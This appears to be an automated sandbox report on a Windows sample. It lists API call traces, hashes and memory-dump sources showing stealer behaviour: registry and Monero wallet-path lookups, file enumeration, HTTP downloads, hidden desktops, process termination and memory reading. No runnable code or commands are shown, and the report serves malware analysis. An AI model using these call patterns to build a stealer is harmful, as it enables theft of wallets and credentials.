                                                                                                                                                                                                                                                  • API ID: File$PointerReadUnothrow_t@std@@@__ehfuncinfo$??2@$HandleInformationSize
                                                                                                                                                                                                                                                  • String ID:
                                                                                                                                                                                                                                                  • API String ID: 998994793-0
                                                                                                                                                                                                                                                  • Opcode ID: 84563d45de5e7e7dfbdedab2ba3d9c28b9990e6308a4cfc2197bd82fb4c0f57d
                                                                                                                                                                                                                                                  • Instruction ID: ddda595af80ec950f864e733dfaf86c15ba5cdc8ff8ff1ee9bb0ea447fc4cfe9
                                                                                                                                                                                                                                                  • Opcode Fuzzy Hash: 84563d45de5e7e7dfbdedab2ba3d9c28b9990e6308a4cfc2197bd82fb4c0f57d
                                                                                                                                                                                                                                                  • Instruction Fuzzy Hash: A6515771604305AFD724DF16C884EABBBE8FFC4714F50492EF58997201D734A84ACBA9
                                                                                                                                                                                                                                                  APIs
                                                                                                                                                                                                                                                  • memset.MSVCRT ref: 009C8C2A
                                                                                                                                                                                                                                                  • RegOpenKeyExA.ADVAPI32(80000001,00000000,00020119,?), ref: 009C8C47
                                                                                                                                                                                                                                                  • RegQueryValueExA.ADVAPI32(?,00000000,00000000,?,?), ref: 009C8C61
                                                                                                                                                                                                                                                    • Part of subcall function 009C39A7: lstrcpy.KERNEL32(00000000), ref: 009C39CA
                                                                                                                                                                                                                                                    • Part of subcall function 009C8952: FindFirstFileA.KERNEL32(?,?), ref: 009C89A7
                                                                                                                                                                                                                                                    • Part of subcall function 009C8952: lstrcat.KERNEL32(?,?), ref: 009C8A6B
                                                                                                                                                                                                                                                    • Part of subcall function 009C8952: lstrcat.KERNEL32(?), ref: 009C8A78
                                                                                                                                                                                                                                                    • Part of subcall function 009C8952: lstrcat.KERNEL32(?,?), ref: 009C8A86
                                                                                                                                                                                                                                                    • Part of subcall function 009C8952: lstrcat.KERNEL32(?,?), ref: 009C8A93
                                                                                                                                                                                                                                                    • Part of subcall function 009C8952: lstrcat.KERNEL32(?,?), ref: 009C8ACD
                                                                                                                                                                                                                                                    • Part of subcall function 009C8952: FindNextFileA.KERNEL32(00000000,?), ref: 009C8BB6
                                                                                                                                                                                                                                                    • Part of subcall function 009C8952: FindClose.KERNEL32(00000000), ref: 009C8BC5
                                                                                                                                                                                                                                                  • RegCloseKey.ADVAPI32(?), ref: 009C8C6A
                                                                                                                                                                                                                                                  • lstrcat.KERNEL32(?,?), ref: 009C8C84
                                                                                                                                                                                                                                                  • lstrcat.KERNEL32(?), ref: 009C8C91
                                                                                                                                                                                                                                                  Strings
                                                                                                                                                                                                                                                  Memory Dump Source
                                                                                                                                                                                                                                                  • Source File: 00000000.00000002.2205023131.00000000009B0000.00000040.00001000.00020000.00000000.sdmp, Offset: 009B0000, based on PE: false
                                                                                                                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                  • Snapshot File: hcaresult_0_2_9b0000_dZKPE9gotO.jbxd
                                                                                                                                                                                                                                                  Similarity
                                                                                                                                                                                                                                                  • API ID: lstrcat$Find$CloseFile$FirstNextOpenQueryValuelstrcpymemset
                                                                                                                                                                                                                                                  • String ID: "6c$@6c$X6c
                                                                                                                                                                                                                                                  • API String ID: 358504995-2427117290
                                                                                                                                                                                                                                                  • Opcode ID: ce8f7ae3a830e0298fbfe742e94f4418e49632205cfaafa19303167fb0e32543
                                                                                                                                                                                                                                                  • Instruction ID: 923b01d326b7d77fcf1f7e68d725d49e02b60891e40297ff9020e9c84982e50d
                                                                                                                                                                                                                                                  • Opcode Fuzzy Hash: ce8f7ae3a830e0298fbfe742e94f4418e49632205cfaafa19303167fb0e32543
                                                                                                                                                                                                                                                  • Instruction Fuzzy Hash: 55C15275D10748CADF01EFA8C982AFA77B4AF9D304B00D25DED4566112EB30AAD5CB92
                                                                                                                                                                                                                                                  APIs
                                                                                                                                                                                                                                                    • Part of subcall function 009C39A7: lstrcpy.KERNEL32(00000000), ref: 009C39CA
                                                                                                                                                                                                                                                    • Part of subcall function 009B6E47: ??_U@YAPAXI@Z.MSVCRT(00000400,?,?,?,?,009B6F0F,?,?,?,?), ref: 009B6E7A
                                                                                                                                                                                                                                                    • Part of subcall function 009B6E47: ??_U@YAPAXI@Z.MSVCRT(00000400,?,?,?,?), ref: 009B6E86
                                                                                                                                                                                                                                                    • Part of subcall function 009B6E47: ??_U@YAPAXI@Z.MSVCRT(00000400,?,?,?,?,?), ref: 009B6E92
                                                                                                                                                                                                                                                    • Part of subcall function 009C3975: lstrcpy.KERNEL32(00000000,?), ref: 009C3999
                                                                                                                                                                                                                                                  • StrCmpCA.SHLWAPI(?), ref: 009B8AEA
                                                                                                                                                                                                                                                  • InternetConnectA.WININET ref: 009B8B23
                                                                                                                                                                                                                                                  • InternetSetOptionA.WININET(00000000,0000001F,?,00000004), ref: 009B8B9B
                                                                                                                                                                                                                                                  • HttpSendRequestA.WININET ref: 009B8BAF
                                                                                                                                                                                                                                                  • HttpQueryInfoA.WININET(00000000,00000013,?,00000100,00000000), ref: 009B8BC7
                                                                                                                                                                                                                                                  • InternetReadFile.WININET(00000000,?,000007CF,?), ref: 009B8BFF
                                                                                                                                                                                                                                                  • InternetCloseHandle.WININET(00000000), ref: 009B8C95
                                                                                                                                                                                                                                                  • InternetCloseHandle.WININET(00000000), ref: 009B8D03
                                                                                                                                                                                                                                                  Memory Dump Source
                                                                                                                                                                                                                                                  • Source File: 00000000.00000002.2205023131.00000000009B0000.00000040.00001000.00020000.00000000.sdmp, Offset: 009B0000, based on PE: false
                                                                                                                                                                                                                                                  Similarity
                                                                                                                                                                                                                                                  • API ID: Internet$CloseHandleHttplstrcpy$ConnectFileInfoOptionQueryReadRequestSend
                                                                                                                                                                                                                                                  • String ID: p7c
                                                                                                                                                                                                                                                  APIs
                                                                                                                                                                                                                                                  • memset.MSVCRT ref: 009BAE10
                                                                                                                                                                                                                                                  • OpenDesktopA.USER32(?,00000000,00000001,10000000), ref: 009BAE7F
                                                                                                                                                                                                                                                  • CreateDesktopA.USER32 ref: 009BAEA3
                                                                                                                                                                                                                                                  • memset.MSVCRT ref: 009BAEBA
                                                                                                                                                                                                                                                  • lstrcat.KERNEL32(?,?), ref: 009BAEC6
                                                                                                                                                                                                                                                  • lstrcat.KERNEL32(?,?), ref: 009BAED0
                                                                                                                                                                                                                                                  • memset.MSVCRT ref: 009BAF0A
                                                                                                                                                                                                                                                  • CreateProcessA.KERNEL32 ref: 009BAFDB
                                                                                                                                                                                                                                                  • Sleep.KERNEL32(00001388), ref: 009BAFEE
                                                                                                                                                                                                                                                    • Part of subcall function 009C39A7: lstrcpy.KERNEL32(00000000), ref: 009C39CA
                                                                                                                                                                                                                                                    • Part of subcall function 009BAA28: memset.MSVCRT ref: 009BAAFC
                                                                                                                                                                                                                                                    • Part of subcall function 009C55A9: CreateToolhelp32Snapshot.KERNEL32(00000002,00000000), ref: 009C55BF
                                                                                                                                                                                                                                                    • Part of subcall function 009C55A9: Process32First.KERNEL32(00000000,?), ref: 009C55C9
                                                                                                                                                                                                                                                    • Part of subcall function 009C55A9: Process32Next.KERNEL32(00000000,?), ref: 009C55D5
                                                                                                                                                                                                                                                    • Part of subcall function 009C55A9: OpenProcess.KERNEL32(00000001,00000000,?), ref: 009C55F9
                                                                                                                                                                                                                                                    • Part of subcall function 009C55A9: TerminateProcess.KERNEL32(00000000,00000000), ref: 009C5608
                                                                                                                                                                                                                                                    • Part of subcall function 009C55A9: CloseHandle.KERNEL32(00000000), ref: 009C560F
                                                                                                                                                                                                                                                    • Part of subcall function 009C55A9: Process32Next.KERNEL32(00000000,?), ref: 009C5617
                                                                                                                                                                                                                                                    • Part of subcall function 009C55A9: CloseHandle.KERNEL32(00000000), ref: 009C5622
                                                                                                                                                                                                                                                  • CloseDesktop.USER32(?), ref: 009BB0A2
                                                                                                                                                                                                                                                  Memory Dump Source
                                                                                                                                                                                                                                                  • Source File: 00000000.00000002.2205023131.00000000009B0000.00000040.00001000.00020000.00000000.sdmp, Offset: 009B0000, based on PE: false
                                                                                                                                                                                                                                                  Similarity
                                                                                                                                                                                                                                                  • API ID: memset$CloseCreateDesktopProcessProcess32$HandleNextOpenlstrcat$FirstSleepSnapshotTerminateToolhelp32lstrcpy
                                                                                                                                                                                                                                                  APIs
                                                                                                                                                                                                                                                  • memset.MSVCRT ref: 004014E2
                                                                                                                                                                                                                                                  • lstrcatA.KERNEL32(?,00000000), ref: 0040157E
                                                                                                                                                                                                                                                  • lstrlenA.KERNEL32(?), ref: 00401581
                                                                                                                                                                                                                                                  • CopyFileA.KERNEL32(?,00000000,00000001), ref: 0040170F
                                                                                                                                                                                                                                                  • DeleteFileA.KERNEL32(00000000,?), ref: 004017D8
                                                                                                                                                                                                                                                  Memory Dump Source
                                                                                                                                                                                                                                                  • Source File: 00000000.00000002.2204360169.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                                                  Similarity
                                                                                                                                                                                                                                                  • API ID: File$CopyDeletelstrcatlstrlenmemset
                                                                                                                                                                                                                                                  • String ID: SOFTWARE\monero-project\monero-core$wallet_p$wallet_path
                                                                                                                                                                                                                                                  APIs
                                                                                                                                                                                                                                                  • memset.MSVCRT ref: 009C8F9C
                                                                                                                                                                                                                                                  • memset.MSVCRT ref: 009C8FAD
                                                                                                                                                                                                                                                    • Part of subcall function 009C4D47: SHGetFolderPathA.SHELL32(00000000,?,00000000,00000000,?), ref: 009C4D7F
                                                                                                                                                                                                                                                  • lstrcat.KERNEL32(?), ref: 009C8FEB
                                                                                                                                                                                                                                                  • lstrcat.KERNEL32(?,?), ref: 009C8FF9
                                                                                                                                                                                                                                                  • lstrcat.KERNEL32(?), ref: 009C9006
                                                                                                                                                                                                                                                    • Part of subcall function 009C3975: lstrcpy.KERNEL32(00000000,?), ref: 009C3999
                                                                                                                                                                                                                                                    • Part of subcall function 009C39A7: lstrcpy.KERNEL32(00000000), ref: 009C39CA
                                                                                                                                                                                                                                                    • Part of subcall function 009BB0D4: GetFileSizeEx.KERNEL32(00000000,?), ref: 009BB11C
                                                                                                                                                                                                                                                    • Part of subcall function 009BB0D4: LocalAlloc.KERNEL32(00000040,8BE3897C), ref: 009BB13F
                                                                                                                                                                                                                                                    • Part of subcall function 009BB0D4: ReadFile.KERNEL32(00000000,EC8350EC,8BE3897C,?,00000000), ref: 009BB160
                                                                                                                                                                                                                                                    • Part of subcall function 009BB0D4: CloseHandle.KERNEL32(00000000), ref: 009BB186
                                                                                                                                                                                                                                                    • Part of subcall function 009C5202: GlobalAlloc.KERNEL32(00000000,?,?,?,?,?,009C9104,?,?,?), ref: 009C520D
                                                                                                                                                                                                                                                  • StrStrA.SHLWAPI(00000000,?,?,?), ref: 009C910D
                                                                                                                                                                                                                                                  • GlobalFree.KERNEL32(00000000), ref: 009C928E
                                                                                                                                                                                                                                                    • Part of subcall function 009BB19F: lstrlen.KERNEL32(?,00000000,?,00000000,?,?,009B882B,00000000,?,?,?,?,?,?,?), ref: 009BB1AD
                                                                                                                                                                                                                                                    • Part of subcall function 009BB19F: LocalAlloc.KERNEL32(00000040,00000000,?,009B882B,00000000,?,?,?,?,?,?,?), ref: 009BB1D8
                                                                                                                                                                                                                                                  • StrCmpCA.SHLWAPI(?,0042EEFC), ref: 009C9238
                                                                                                                                                                                                                                                  • lstrcat.KERNEL32(?,-0000000C), ref: 009C924A
                                                                                                                                                                                                                                                  Memory Dump Source
                                                                                                                                                                                                                                                  • Source File: 00000000.00000002.2205023131.00000000009B0000.00000040.00001000.00020000.00000000.sdmp, Offset: 009B0000, based on PE: false
                                                                                                                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                  • Snapshot File: hcaresult_0_2_9b0000_dZKPE9gotO.jbxd
                                                                                                                                                                                                                                                  Yara matches
                                                                                                                                                                                                                                                  Similarity
                                                                                                                                                                                                                                                  • API ID: lstrcat$Alloc$FileGlobalLocallstrcpymemset$CloseFolderFreeHandlePathReadSizelstrlen
                                                                                                                                                                                                                                                  • String ID:
                                                                                                                                                                                                                                                  • API String ID: 652918382-0
                                                                                                                                                                                                                                                  • Opcode ID: ffb8687492f831870c222a0275bad59cdba76b2a70563ac4df95714154973f44
                                                                                                                                                                                                                                                  • Instruction ID: 47ce466a4fb3c1f2010b8634fa0c2ab29883e4ba8dbbb2ebbe76b895ade430b1
                                                                                                                                                                                                                                                  • Opcode Fuzzy Hash: ffb8687492f831870c222a0275bad59cdba76b2a70563ac4df95714154973f44
                                                                                                                                                                                                                                                  • Instruction Fuzzy Hash: 07B17E71D007099BDF10EFA4C886FEE77B8FF89300F008559E955A7252EB70AA49CB91
                                                                                                                                                                                                                                                  APIs
                                                                                                                                                                                                                                                  • GetFileInformationByHandle.KERNEL32(?,?,?,?,?,?,?,?,?,?,?,?,?,?,?,009CFE13), ref: 009CF9E6
                                                                                                                                                                                                                                                  • GetFileSize.KERNEL32(?,00000000,?,?,?,?,?,?,?,?,?,?,?,?,?,009CFE13), ref: 009CFA2A
                                                                                                                                                                                                                                                  • SetFilePointer.KERNEL32(?,00000000,00000000,00000000,?,?,?,?,?,?,?,?,?,?,?,?), ref: 009CFA46
                                                                                                                                                                                                                                                  • SetFilePointer.KERNEL32(?,00000024,00000000,00000000,?,?,?,?,?,?,?,?,?,?,?,?), ref: 009CFA67
                                                                                                                                                                                                                                                  • SetFilePointer.KERNEL32(?,?,00000000,00000000,?,?,?,?,?,?,?,?,?,?,?,?), ref: 009CFA9C
                                                                                                                                                                                                                                                  • ReadFile.KERNEL32(?,?,00000004,?,00000000,?,?,?,?,?,?,?,?,?,?,?), ref: 009CFAB0
                                                                                                                                                                                                                                                  • __ehfuncinfo$??2@YAPAXIABUnothrow_t@std@@@Z.LIBCMT ref: 009CFB3E
                                                                                                                                                                                                                                                  • __ehfuncinfo$??2@YAPAXIABUnothrow_t@std@@@Z.LIBCMT ref: 009CFB5D
                                                                                                                                                                                                                                                  • __ehfuncinfo$??2@YAPAXIABUnothrow_t@std@@@Z.LIBCMT ref: 009CFB80
                                                                                                                                                                                                                                                  Memory Dump Source
                                                                                                                                                                                                                                                  • Source File: 00000000.00000002.2205023131.00000000009B0000.00000040.00001000.00020000.00000000.sdmp, Offset: 009B0000, based on PE: false
                                                                                                                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                  • Snapshot File: hcaresult_0_2_9b0000_dZKPE9gotO.jbxd
                                                                                                                                                                                                                                                  Yara matches
                                                                                                                                                                                                                                                  Similarity
                                                                                                                                                                                                                                                  • API ID: File$PointerUnothrow_t@std@@@__ehfuncinfo$??2@$HandleInformationReadSize
                                                                                                                                                                                                                                                  • String ID:
                                                                                                                                                                                                                                                  • API String ID: 4184024484-0
                                                                                                                                                                                                                                                  • Opcode ID: 84563d45de5e7e7dfbdedab2ba3d9c28b9990e6308a4cfc2197bd82fb4c0f57d
                                                                                                                                                                                                                                                  • Instruction ID: 0d28e2108dc60ebdc3919efe85684079db3834add4d493568b06466e6f15d280
                                                                                                                                                                                                                                                  • Opcode Fuzzy Hash: 84563d45de5e7e7dfbdedab2ba3d9c28b9990e6308a4cfc2197bd82fb4c0f57d
                                                                                                                                                                                                                                                  • Instruction Fuzzy Hash: 85514772604346ABD724CF15C894F6BBBE9FBC4704F51882DF98997201E734A805CBA6
                                                                                                                                                                                                                                                  APIs
                                                                                                                                                                                                                                                  • lstrlenA.KERNEL32(?,?,00010000,?,004200FB,?), ref: 0041F526
                                                                                                                                                                                                                                                  • StrCmpCA.SHLWAPI(?,00645128), ref: 0041F570
                                                                                                                                                                                                                                                  • StrCmpCA.SHLWAPI(?,0064512C), ref: 0041F5A7
                                                                                                                                                                                                                                                  • StrCmpCA.SHLWAPI(?,00645134), ref: 0041F5DC
                                                                                                                                                                                                                                                  • StrCmpCA.SHLWAPI(?,0064513C), ref: 0041F611
                                                                                                                                                                                                                                                  • StrCmpCA.SHLWAPI(?,00645144), ref: 0041F646
                                                                                                                                                                                                                                                  • StrCmpCA.SHLWAPI(?,0064514C), ref: 0041F67B
                                                                                                                                                                                                                                                  • StrCmpCA.SHLWAPI(?,00645154), ref: 0041F6A5
                                                                                                                                                                                                                                                  • StrCmpCA.SHLWAPI(?,0064515C), ref: 0041F6D6
                                                                                                                                                                                                                                                  Memory Dump Source
                                                                                                                                                                                                                                                  • Source File: 00000000.00000002.2204360169.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                  • Snapshot File: hcaresult_0_2_400000_dZKPE9gotO.jbxd
                                                                                                                                                                                                                                                  Yara matches
                                                                                                                                                                                                                                                  Similarity
                                                                                                                                                                                                                                                  • API ID: lstrlen
                                                                                                                                                                                                                                                  • String ID:
                                                                                                                                                                                                                                                  • API String ID: 1659193697-0
                                                                                                                                                                                                                                                  • Opcode ID: 8ecfe62204233b8180d5d713a15dd486603fff8ba4875434be9a5bcb2e84d819
                                                                                                                                                                                                                                                  • Instruction ID: b1bc6718bd93d0afd4b9143767effb8c204e4d7c234b08edbe8f1f012b2e33c7
                                                                                                                                                                                                                                                  • Opcode Fuzzy Hash: 8ecfe62204233b8180d5d713a15dd486603fff8ba4875434be9a5bcb2e84d819
                                                                                                                                                                                                                                                  • Instruction Fuzzy Hash: 8A413078345BD16BEB319B24AD5839B3E97575370CF48207AE042972A3D3FC448B8759
                                                                                                                                                                                                                                                  APIs
                                                                                                                                                                                                                                                  • lstrlen.KERNEL32(?,?,00010000,?,009D0362,?), ref: 009CF78D
                                                                                                                                                                                                                                                  • StrCmpCA.SHLWAPI(?,00645128), ref: 009CF7D7
                                                                                                                                                                                                                                                  • StrCmpCA.SHLWAPI(?,0064512C), ref: 009CF80E
                                                                                                                                                                                                                                                  • StrCmpCA.SHLWAPI(?,00645134), ref: 009CF843
                                                                                                                                                                                                                                                  • StrCmpCA.SHLWAPI(?,0064513C), ref: 009CF878
                                                                                                                                                                                                                                                  • StrCmpCA.SHLWAPI(?,00645144), ref: 009CF8AD
                                                                                                                                                                                                                                                  • StrCmpCA.SHLWAPI(?,0064514C), ref: 009CF8E2
                                                                                                                                                                                                                                                  • StrCmpCA.SHLWAPI(?,00645154), ref: 009CF90C
                                                                                                                                                                                                                                                  • StrCmpCA.SHLWAPI(?,0064515C), ref: 009CF93D
                                                                                                                                                                                                                                                  Memory Dump Source
                                                                                                                                                                                                                                                  • Source File: 00000000.00000002.2205023131.00000000009B0000.00000040.00001000.00020000.00000000.sdmp, Offset: 009B0000, based on PE: false
                                                                                                                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                  • Snapshot File: hcaresult_0_2_9b0000_dZKPE9gotO.jbxd
                                                                                                                                                                                                                                                  Yara matches
                                                                                                                                                                                                                                                  Similarity
                                                                                                                                                                                                                                                  • API ID: lstrlen
                                                                                                                                                                                                                                                  • String ID:
                                                                                                                                                                                                                                                  • API String ID: 1659193697-0
                                                                                                                                                                                                                                                  • Opcode ID: 8ecfe62204233b8180d5d713a15dd486603fff8ba4875434be9a5bcb2e84d819
                                                                                                                                                                                                                                                  • Instruction ID: d966903298edfa6a8e00da11860d9dedecd83c96d4fa988fa2f165a1916ad718
                                                                                                                                                                                                                                                  • Opcode Fuzzy Hash: 8ecfe62204233b8180d5d713a15dd486603fff8ba4875434be9a5bcb2e84d819
                                                                                                                                                                                                                                                  • Instruction Fuzzy Hash: 1D414178A44BC46FFB319B24AD68B563E9B5723718F98307CE482971A3C3F84449C766
                                                                                                                                                                                                                                                  APIs
                                                                                                                                                                                                                                                  • ??_U@YAPAXI@Z.MSVCRT(00064000), ref: 009C35C9
                                                                                                                                                                                                                                                  • OpenProcess.KERNEL32(001FFFFF,00000000,?), ref: 009C35ED
                                                                                                                                                                                                                                                  • memset.MSVCRT ref: 009C3614
                                                                                                                                                                                                                                                  • ReadProcessMemory.KERNEL32(000000FF,00000000,?,00000208,00000000,??d,00643F3F,-00000208,?,000000FF,00000FFF,?,?), ref: 009C36C3
                                                                                                                                                                                                                                                  • ??_V@YAXPAX@Z.MSVCRT(00000000,??d,00643F3F,00000000,00000000,000000FF,00000FFF,00000000,?), ref: 009C3741
                                                                                                                                                                                                                                                  Strings
                                                                                                                                                                                                                                                  Memory Dump Source
                                                                                                                                                                                                                                                  • Source File: 00000000.00000002.2205023131.00000000009B0000.00000040.00001000.00020000.00000000.sdmp, Offset: 009B0000, based on PE: false
                                                                                                                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                  • Snapshot File: hcaresult_0_2_9b0000_dZKPE9gotO.jbxd
                                                                                                                                                                                                                                                  Yara matches
                                                                                                                                                                                                                                                  Similarity
                                                                                                                                                                                                                                                  • API ID: Process$MemoryOpenReadmemset
                                                                                                                                                                                                                                                  • String ID: ??d
                                                                                                                                                                                                                                                  • API String ID: 960838850-3262641346
                                                                                                                                                                                                                                                  APIs
                                                                                                                                                                                                                                                    • Part of subcall function 00413740: lstrcpyA.KERNEL32(00000000,?,?,?,?,0041A972,?), ref: 00413763
                                                                                                                                                                                                                                                    • Part of subcall function 00406BE0: ??_U@YAPAXI@Z.MSVCRT(00000400,?,?,?,?,004073C4,?), ref: 00406C13
                                                                                                                                                                                                                                                    • Part of subcall function 00406BE0: ??_U@YAPAXI@Z.MSVCRT(00000400,?), ref: 00406C1F
                                                                                                                                                                                                                                                    • Part of subcall function 00406BE0: ??_U@YAPAXI@Z.MSVCRT(00000400,?,?), ref: 00406C2B
                                                                                                                                                                                                                                                    • Part of subcall function 00406BE0: lstrlenA.KERNEL32(00000000,?,?,?), ref: 00406C4A
                                                                                                                                                                                                                                                    • Part of subcall function 00406BE0: InternetCrackUrlA.WININET(00000000,00000000,00000000), ref: 00406C5A
                                                                                                                                                                                                                                                  • InternetOpenA.WININET ref: 004086E6
                                                                                                                                                                                                                                                  • StrCmpCA.SHLWAPI(?), ref: 004086FB
                                                                                                                                                                                                                                                  • CreateFileA.KERNEL32 ref: 0040875D
                                                                                                                                                                                                                                                  • InternetReadFile.WININET(00000000,?,00000400,?), ref: 00408772
                                                                                                                                                                                                                                                  • WriteFile.KERNEL32(00000000,?,?,?,00000000), ref: 0040878C
                                                                                                                                                                                                                                                  • CloseHandle.KERNEL32(00000000,?,00000400), ref: 004087B1
                                                                                                                                                                                                                                                  • InternetCloseHandle.WININET(00000000), ref: 004087B8
                                                                                                                                                                                                                                                  • InternetCloseHandle.WININET(?), ref: 004087C1
                                                                                                                                                                                                                                                  Memory Dump Source
                                                                                                                                                                                                                                                  • Source File: 00000000.00000002.2204360169.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                  • Snapshot File: hcaresult_0_2_400000_dZKPE9gotO.jbxd
                                                                                                                                                                                                                                                  Yara matches
                                                                                                                                                                                                                                                  Similarity
                                                                                                                                                                                                                                                  • API ID: Internet$CloseFileHandle$CrackCreateOpenReadWritelstrcpylstrlen
                                                                                                                                                                                                                                                  • String ID:
                                                                                                                                                                                                                                                  • API String ID: 3324746675-0
                                                                                                                                                                                                                                                  APIs
                                                                                                                                                                                                                                                  • CreateToolhelp32Snapshot.KERNEL32(00000002,00000000), ref: 009C55BF
                                                                                                                                                                                                                                                  • Process32First.KERNEL32(00000000,?), ref: 009C55C9
                                                                                                                                                                                                                                                  • Process32Next.KERNEL32(00000000,?), ref: 009C55D5
                                                                                                                                                                                                                                                  • OpenProcess.KERNEL32(00000001,00000000,?), ref: 009C55F9
                                                                                                                                                                                                                                                  • TerminateProcess.KERNEL32(00000000,00000000), ref: 009C5608
                                                                                                                                                                                                                                                  • CloseHandle.KERNEL32(00000000), ref: 009C560F
                                                                                                                                                                                                                                                  • Process32Next.KERNEL32(00000000,?), ref: 009C5617
                                                                                                                                                                                                                                                  • CloseHandle.KERNEL32(00000000), ref: 009C5622
                                                                                                                                                                                                                                                  Memory Dump Source
                                                                                                                                                                                                                                                  • Source File: 00000000.00000002.2205023131.00000000009B0000.00000040.00001000.00020000.00000000.sdmp, Offset: 009B0000, based on PE: false
                                                                                                                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                  • Snapshot File: hcaresult_0_2_9b0000_dZKPE9gotO.jbxd
                                                                                                                                                                                                                                                  Yara matches
                                                                                                                                                                                                                                                  Similarity
                                                                                                                                                                                                                                                  • API ID: Process32$CloseHandleNextProcess$CreateFirstOpenSnapshotTerminateToolhelp32
                                                                                                                                                                                                                                                  • String ID:
                                                                                                                                                                                                                                                  • API String ID: 3836391474-0
                                                                                                                                                                                                                                                  APIs
                                                                                                                                                                                                                                                  Memory Dump Source
                                                                                                                                                                                                                                                  • Source File: 00000000.00000002.2204360169.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                  • Snapshot File: hcaresult_0_2_400000_dZKPE9gotO.jbxd
                                                                                                                                                                                                                                                  Yara matches
                                                                                                                                                                                                                                                  Similarity
                                                                                                                                                                                                                                                  • API ID: memmove$memcpy
                                                                                                                                                                                                                                                  • String ID:
                                                                                                                                                                                                                                                  • API String ID: 3033661859-0
                                                                                                                                                                                                                                                  • Opcode ID: de34b65fc7503c42e13109b3f3e82d58de50e4a04b5c11609258844348972ae1
                                                                                                                                                                                                                                                  • Instruction ID: 2ac252bb25fc00d8f9626fb7efa383948f2b52263c374b358be136e1b8cb81eb
                                                                                                                                                                                                                                                  • Opcode Fuzzy Hash: de34b65fc7503c42e13109b3f3e82d58de50e4a04b5c11609258844348972ae1
                                                                                                                                                                                                                                                  • Instruction Fuzzy Hash: 88A1C1317043109BC7149E19DA8095BB7E6EFC4754F68483EF444DB311D6BAEC92CB9A
                                                                                                                                                                                                                                                  APIs
                                                                                                                                                                                                                                                  Memory Dump Source
                                                                                                                                                                                                                                                  • Source File: 00000000.00000002.2205023131.00000000009B0000.00000040.00001000.00020000.00000000.sdmp, Offset: 009B0000, based on PE: false
                                                                                                                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                  • Snapshot File: hcaresult_0_2_9b0000_dZKPE9gotO.jbxd
                                                                                                                                                                                                                                                  Yara matches
                                                                                                                                                                                                                                                  Similarity
                                                                                                                                                                                                                                                  • API ID: memmove$memcpy
                                                                                                                                                                                                                                                  • String ID:
                                                                                                                                                                                                                                                  • API String ID: 3033661859-0
                                                                                                                                                                                                                                                  • Opcode ID: 7af7d1fd85c135fb44ad438f81dc935373bad9a349424fdd79d194c55280076f
                                                                                                                                                                                                                                                  • Instruction ID: c5513062016e17946ee5c3fe4576805e4850dab4d030b6a905b72e3944392ea2
                                                                                                                                                                                                                                                  • Opcode Fuzzy Hash: 7af7d1fd85c135fb44ad438f81dc935373bad9a349424fdd79d194c55280076f
                                                                                                                                                                                                                                                  • Instruction Fuzzy Hash: 6FA18F35B05301ABC7149F19C880A2BB7E6AFC8714F29897DF489DB311D676EC42CB92
                                                                                                                                                                                                                                                  APIs
                                                                                                                                                                                                                                                  • InternetReadFile.WININET(00000000,?,00001000), ref: 009B9975
                                                                                                                                                                                                                                                  • InternetReadFile.WININET(00000000,?,00001000), ref: 009B999B
                                                                                                                                                                                                                                                  • InternetCloseHandle.WININET(00000000), ref: 009B99AD
                                                                                                                                                                                                                                                  • InternetCloseHandle.WININET(19d), ref: 009B99B7
                                                                                                                                                                                                                                                    • Part of subcall function 009C2631: memcpy.MSVCRT(?,009C25B6,?,?,00000000,?,009C25B6,?,?,009C25EF,?,?,009C25B6,?,?,?), ref: 009C267E
                                                                                                                                                                                                                                                  Strings
                                                                                                                                                                                                                                                  Memory Dump Source
                                                                                                                                                                                                                                                  • Source File: 00000000.00000002.2205023131.00000000009B0000.00000040.00001000.00020000.00000000.sdmp, Offset: 009B0000, based on PE: false
                                                                                                                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                  • Snapshot File: hcaresult_0_2_9b0000_dZKPE9gotO.jbxd
                                                                                                                                                                                                                                                  Yara matches
                                                                                                                                                                                                                                                  Similarity
                                                                                                                                                                                                                                                  • API ID: Internet$CloseFileHandleRead$memcpy
                                                                                                                                                                                                                                                  • String ID: 19d
                                                                                                                                                                                                                                                  • API String ID: 1306965030-2662563406
                                                                                                                                                                                                                                                  • Opcode ID: da3cd38ceaf56c841c6e601ce89e91c6084a4beed059c7463e3cd911340a452f
                                                                                                                                                                                                                                                  • Instruction ID: 602c26139a55e847dbf6b94b445025fe1a8dd8b58fdfed596af3c812c8214ff5
                                                                                                                                                                                                                                                  • Opcode Fuzzy Hash: da3cd38ceaf56c841c6e601ce89e91c6084a4beed059c7463e3cd911340a452f
                                                                                                                                                                                                                                                  • Instruction Fuzzy Hash: 5C512934119390AFE7219F28DD457A67FEAAFD2314F04160CF5C54A3A1EBF58588C752
                                                                                                                                                                                                                                                  APIs
                                                                                                                                                                                                                                                    • Part of subcall function 009C39A7: lstrcpy.KERNEL32(00000000), ref: 009C39CA
                                                                                                                                                                                                                                                    • Part of subcall function 009B6E47: ??_U@YAPAXI@Z.MSVCRT(00000400,?,?,?,?,009B6F0F,?,?,?,?), ref: 009B6E7A
                                                                                                                                                                                                                                                    • Part of subcall function 009B6E47: ??_U@YAPAXI@Z.MSVCRT(00000400,?,?,?,?), ref: 009B6E86
                                                                                                                                                                                                                                                    • Part of subcall function 009B6E47: ??_U@YAPAXI@Z.MSVCRT(00000400,?,?,?,?,?), ref: 009B6E92
                                                                                                                                                                                                                                                  • StrCmpCA.SHLWAPI(?), ref: 009B8962
